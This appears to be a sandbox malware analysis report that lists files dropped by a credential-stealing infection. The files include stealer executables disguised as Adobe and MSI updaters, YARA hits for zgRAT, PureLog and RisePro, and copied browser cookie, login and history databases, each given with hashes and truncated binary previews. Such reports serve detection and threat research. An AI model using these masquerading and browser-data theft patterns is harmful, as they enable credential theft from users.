Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+(..+k\....+Z_....+Z_....+Z_....+Rich...+........PE..L...q..f...............'.@..........Rt.......P....@..........................p............@.............................P.......<............................P......h...................................@............P..d............................text............0.................. ..`.BsS.........@.......4.............. ..`.rdata..4....P.......D..............@..@.data...4I.......:..................@....reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\AdobeUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\AdobeUpdaterV168.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	528384
Entropy (8bit):	7.661614937929796
Encrypted:	false
SSDEEP:	12288:YwFARGxNB+mIuUOI+J0X6KALNGK34y1sB2Y+Jg4c:Yj4xb+mrZj1VHSB2Y6d
MD5:	0309DD0131150796EA99B30A62194FAE
SHA1:	2DF6E334708EAE810A74B844FD57E18E9FDC34CD
SHA-256:	07C09BA5A84F619E5B83A54298FFC58D20B00F14399C7A94B7F02B70EFC60F35
SHA-512:	3D4E5A0718D04FEE92D8040880B631107D1E23A6B3BCE430D58769179AF999C28B99E50C5CD45F283339F7BBB24FFACBF601A5447EDB12E28DA4517FBFA282E8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+(..+k\....+Z_....+Z_....+Z_....+Rich...+........PE..L......f...............'.@..........Rt.......P....@..........................0............@.............................P.......<...................................h...................................@............P..d............................text............0.................. ..`.BsS.........@.......4.............. ..`.rdata..4....P.......D..............@..@.data...............................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\AdobeUpdaterV168_b055341c05e33d6c2334ce6d41cea915\AdobeUpdaterV168.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.164843423829662
Encrypted:	false
SSDEEP:	6144:PW1SR6pmLZAuSWjVBojHmrXLXxhABtHqS2/Y++Rh5qrU/PD:PW1SRKGZIYViTGXLgHqX/k0rUn
MD5:	2FCB3543D06F526E93C7276356F557B7
SHA1:	3A646514C23CD1D38E83531B9399E2360EC62578
SHA-256:	7E359CC02DE7A6050C8B81EB16278E5356BE6CA904950E820F4AFADB8BB9EA2A
SHA-512:	FFA19E94CAEB66692CF30F4DCC036369DAA4D0B5377F4E3A7330C62DD8E10C1E0C388A68D8E6EAFB31E57F70312884123433AF9D8A0DFD601F9286A073795604
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.....$.......I... ...`....@.. ....................................@..................................H..K....`... ........................................................................... ............... ..H............text...4)... ..................... ..`.rsrc.... ...`..."...,..............@..@.reloc...............N..............@..B.................I......H........Y..`x......0...<....)..............................................(......0...........s........~....%:....&~......!...s....%.....(...+o.....8[....o...............%..F~....(.....%..G~....(.....%..H~....(.....%..e~....(.....~....(.......o......8......(......s.......s>.......~....}....~...........s....(....o....}......{.....I~....(....o........9......I~....(.......8C........~....(....o....:......{....~....(....8......{....~....(.........(...........9........o........(

C:\Users\user\AppData\Local\AdobeUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\AdobeUpdaterV168.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	430592
Entropy (8bit):	7.502731457989579
Encrypted:	false
SSDEEP:	12288:Zh0vCnLVT7zishmwaOF9dJl3AnhpzTly:Z8kLVPzMO9dnQnhZT
MD5:	F88272EA7674D3ACEDD8ADCF7643C598
SHA1:	0066FD44E2CD9293AF414F735BD80456F4E3EB1D
SHA-256:	FAD264ACC346BE1E63CD47611CD305CB9C894A13843119E22E87744808295387
SHA-512:	3D3435572767B85307271519A5A51668E284CC9AA0D09BF024AAFF31A4B4329BB189C627CEDA90BA00F02445F0D34F4DE642B30B054ECF9D1AC88BABEB113963
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._.....N...........I...q.M...q.J.....X.._......q.....r.^...r.^...r.^..Rich_..................PE..L...V.~f...............'.j...6......g.............@.......................................@..........................)..P...@*..P...............................4...X...................................@...............d............................text...7X.......Z.................. ..`.BsS....M....p.......^.............. ..`.rdata..f............n..............@..@.data....`...@...P..."..............@....reloc..4........ ...r..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8jZLXI789L2zXDjlm7Fx.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSIUpdaterV168.exe.log

Download File

Process:	C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rise2806[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1854464
Entropy (8bit):	7.954001690712007
Encrypted:	false
SSDEEP:	49152:Ktx9fJc02euDyRs7NNvZpFW3wrqirfHWZjlavwpX:Ktx9fe02beG5Nv+w+irHWZjlavwpX
MD5:	97768AB0A4837757B74DE2AE892BADAB
SHA1:	D8BDFDB717B64EE4CD7A892BBDDD293F7EAF915C
SHA-256:	0F88EA51A56DA966D12311A4B20EA3A6C44315E00747A589F19CF535F90CED77
SHA-512:	78BC5C866B12FCC82CDDA20622694824B227A4D522632FFCA4B6608BB5245A5E39C28E7F10DFD9E253407A922DAE47A83171FB3F605597AF4F7186C3AAF5DCDE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+(..+k\....+Z_....+Z_....+Z_....+Rich...+........PE..L...q..f...............'.@..........Rt.......P....@..........................p............@.............................P.......<............................P......h...................................@............P..d............................text............0.................. ..`.BsS.........@.......4.............. ..`.rdata..4....P.......D..............@..@.data...4I.......:..................@....reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\lumma2806[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	528384
Entropy (8bit):	7.661614937929796
Encrypted:	false
SSDEEP:	12288:YwFARGxNB+mIuUOI+J0X6KALNGK34y1sB2Y+Jg4c:Yj4xb+mrZj1VHSB2Y6d
MD5:	0309DD0131150796EA99B30A62194FAE
SHA1:	2DF6E334708EAE810A74B844FD57E18E9FDC34CD
SHA-256:	07C09BA5A84F619E5B83A54298FFC58D20B00F14399C7A94B7F02B70EFC60F35
SHA-512:	3D4E5A0718D04FEE92D8040880B631107D1E23A6B3BCE430D58769179AF999C28B99E50C5CD45F283339F7BBB24FFACBF601A5447EDB12E28DA4517FBFA282E8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+(..+k\....+Z_....+Z_....+Z_....+Rich...+........PE..L......f...............'.@..........Rt.......P....@..........................0............@.............................P.......<...................................h...................................@............P..d............................text............0.................. ..`.BsS.........@.......4.............. ..`.rdata..4....P.......D..............@..@.data...............................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.164843423829662
Encrypted:	false
SSDEEP:	6144:PW1SR6pmLZAuSWjVBojHmrXLXxhABtHqS2/Y++Rh5qrU/PD:PW1SRKGZIYViTGXLgHqX/k0rUn
MD5:	2FCB3543D06F526E93C7276356F557B7
SHA1:	3A646514C23CD1D38E83531B9399E2360EC62578
SHA-256:	7E359CC02DE7A6050C8B81EB16278E5356BE6CA904950E820F4AFADB8BB9EA2A
SHA-512:	FFA19E94CAEB66692CF30F4DCC036369DAA4D0B5377F4E3A7330C62DD8E10C1E0C388A68D8E6EAFB31E57F70312884123433AF9D8A0DFD601F9286A073795604
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.....$.......I... ...`....@.. ....................................@..................................H..K....`... ........................................................................... ............... ..H............text...4)... ..................... ..`.rsrc.... ...`..."...,..............@..@.reloc...............N..............@..B.................I......H........Y..`x......0...<....)..............................................(......0...........s........~....%:....&~......!...s....%.....(...+o.....8[....o...............%..F~....(.....%..G~....(.....%..H~....(.....%..e~....(.....~....(.......o......8......(......s.......s>.......~....}....~...........s....(....o....}......{.....I~....(....o........9......I~....(.......8C........~....(....o....:......{....~....(....8......{....~....(.........(...........9........o........(

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vidar2806[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	430592
Entropy (8bit):	7.502731457989579
Encrypted:	false
SSDEEP:	12288:Zh0vCnLVT7zishmwaOF9dJl3AnhpzTly:Z8kLVPzMO9dnQnhZT
MD5:	F88272EA7674D3ACEDD8ADCF7643C598
SHA1:	0066FD44E2CD9293AF414F735BD80456F4E3EB1D
SHA-256:	FAD264ACC346BE1E63CD47611CD305CB9C894A13843119E22E87744808295387
SHA-512:	3D3435572767B85307271519A5A51668E284CC9AA0D09BF024AAFF31A4B4329BB189C627CEDA90BA00F02445F0D34F4DE642B30B054ECF9D1AC88BABEB113963
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._.....N...........I...q.M...q.J.....X.._......q.....r.^...r.^...r.^..Rich_..................PE..L...V.~f...............'.j...6......g.............@.......................................@..........................)..P...@*..P...............................4...X...................................@...............d............................text...7X.......Z.................. ..`.BsS....M....p.......^.............. ..`.rdata..f............n..............@..@.data....`...@...P..."..............@....reloc..4........ ...r..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Wb7RPsmWU0j98XyD1Ncm8BU.zip

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	698316
Entropy (8bit):	7.997973266239987
Encrypted:	true
SSDEEP:	12288:PT7rxcBNw108hWRNXEXVIiJC8qksxDRbEMKIOhe1Y7SbkbW98OCRCN:P3rCYq8hWRNXEXyFdMe+SbQi8PQ
MD5:	F0BD91AC6A31391CC9D598DA91176349
SHA1:	8E2A3FACF77FE379F8C78CA7A71BF1B4D3CC97CF
SHA-256:	7F89C9438323AE82C79A885AD2E2C5434E9360766AF0D2E865B5D7A3CD9B8101
SHA-512:	B0882FA0DAF4487A37E1E375AEE8E54150E95C0A2C3783543379CACAC001E046A4694957BFCDF17B3F0A9495453F05D32BE1733EE2B37CDEFD849EF971FED247
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\Wb7RPsmWU0j98XyD1Ncm8BU.zip, Author: Joe Security
Preview:	PK...........X................Cookies\..PK...........XQn.+............Cookies\Chrome_Default.txt.G..r...U.#.5C.....s$..-.D...7.\..$.G.)o....:....Z.C.f_..pm............"..t..t....}.k.@...a.2+P`.0.x.>....s..k%.._..b..P..((......B.....`.7..-m..JY..F....E..l.....I..&.....<J..M.......,V...)b.....Q..k......M?.5L....h}......X..'.0..tB.G...\;.a....4.......B4.......J.4.6.y:....4.-.UfE...3Ap.U5UX....Z.g:e.j.C..Bw..........e..a^.vU:....$..U......B..`._.e.....+...9.{u...7.e...H.]02...%yR".0...x...P<..N....R.}....{.G...;..c..x...kw.'S>.d\|.....B..k.9.t.!>.rh...~n.[....s#/....`.!..Kb8%&.vZB`....O\|.....>K......L...d0..03..t...T&.......`N.xp.."..J.......Q.....c..5...).Z.91.6.j..G.....Wr...a.52!..(^.U.....6....dB.D.^...7..0H.\J9.H.$^`e"..d...\....B.8Z=.qeP.3Y.>..'W.X..T..>z...,..K......g....%B.w4#...;.[]u\|....v...3.;L..U?..b.....u....... .......F...P.a...\|R3.=......r.:.64...#D..^..>.A..ZT.]E........t...f...1..3.....`...X.....C.]%...p.p.ym

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\02zdBXl47cvzcookies.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3b6N2Xdh3CYwplaces.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	528384
Entropy (8bit):	7.661614937929796
Encrypted:	false
SSDEEP:	12288:YwFARGxNB+mIuUOI+J0X6KALNGK34y1sB2Y+Jg4c:Yj4xb+mrZj1VHSB2Y6d
MD5:	0309DD0131150796EA99B30A62194FAE
SHA1:	2DF6E334708EAE810A74B844FD57E18E9FDC34CD
SHA-256:	07C09BA5A84F619E5B83A54298FFC58D20B00F14399C7A94B7F02B70EFC60F35
SHA-512:	3D4E5A0718D04FEE92D8040880B631107D1E23A6B3BCE430D58769179AF999C28B99E50C5CD45F283339F7BBB24FFACBF601A5447EDB12E28DA4517FBFA282E8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+(..+k\....+Z_....+Z_....+Z_....+Rich...+........PE..L......f...............'.@..........Rt.......P....@..........................0............@.............................P.......<...................................h...................................@............P..d............................text............0.................. ..`.BsS.........@.......4.............. ..`.rdata..4....P.......D..............@..@.data...............................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\4E_ETy6bOOw3Login Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\5INc0tVFPkNMHistory

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6JTEmGBjvBASWeb Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1854464
Entropy (8bit):	7.954001690712007
Encrypted:	false
SSDEEP:	49152:Ktx9fJc02euDyRs7NNvZpFW3wrqirfHWZjlavwpX:Ktx9fe02beG5Nv+w+irHWZjlavwpX
MD5:	97768AB0A4837757B74DE2AE892BADAB
SHA1:	D8BDFDB717B64EE4CD7A892BBDDD293F7EAF915C
SHA-256:	0F88EA51A56DA966D12311A4B20EA3A6C44315E00747A589F19CF535F90CED77
SHA-512:	78BC5C866B12FCC82CDDA20622694824B227A4D522632FFCA4B6608BB5245A5E39C28E7F10DFD9E253407A922DAE47A83171FB3F605597AF4F7186C3AAF5DCDE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
